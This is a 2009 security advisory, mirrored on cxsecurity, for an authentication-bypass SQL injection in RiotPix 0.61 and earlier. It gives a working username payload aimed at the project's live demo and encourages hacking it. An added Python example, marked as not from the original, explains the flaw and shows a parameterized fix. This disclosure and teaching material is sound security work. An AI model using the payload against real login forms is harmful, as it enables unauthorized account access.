Bug: RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability ( Ascii Version )


RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

Published: 2009.01.10
Credit: ZoRLu
Risk: Medium
CWE: CWE-89
CVE: CVE-2009-0109
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[~] RiotPix <= 0.61 Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 06.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] MOST IMPORTANT NOTE: whoever hacks the demos will be a ball ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

for demo:

username: logoz ' or '

pass: don't write anything

http://www.riotpix.com/board/

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
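
Added example (not part of the original advisory and not RiotPix code): a hypothetical login check showing why the demo input above is accepted when it is concatenated into the SQL text and rejected when it is bound as a parameter. The table layout, function names, sample password and the SQLite RTRIM collation (standing in for MySQL's trailing-space-insensitive string comparison) are assumptions.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # constructed; use a random per-user salt in practice


def pw_hash(password: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    # Assumption: COLLATE RTRIM mimics MySQL treating 'logoz ' = 'logoz' as true.
    db.execute("CREATE TABLE users (username TEXT COLLATE RTRIM, pwhash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("logoz", pw_hash("constructed-secret")))
    return db


def login_concat(db, username, password):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pwhash = '" + pw_hash(password) + "'")
    # With the advisory's input the WHERE clause becomes
    #   username = 'logoz ' or ('' AND pwhash = '...')
    # so the password test no longer constrains the match.
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_param(db, username, password):
    """Hardened pattern: input is bound as data; hash compared in constant time."""
    row = db.execute("SELECT username, pwhash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row and hmac.compare_digest(row[1], pw_hash(password)):
        return row[0]
    return None


if __name__ == "__main__":
    db = make_db()
    page_input = "logoz ' or '"  # username from the advisory, empty password
    print("concatenated:", login_concat(db, page_input, ""))
    print("parameterized:", login_param(db, page_input, ""))
    print("valid login:", login_param(db, "logoz", "constructed-secret"))
```
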

References:

http://www.securityfocus.com/bid/33132
http://www.milw0rm.com/exploits/7682
http://secunia.com/advisories/33395

Copyright 2014, cxsecurity.com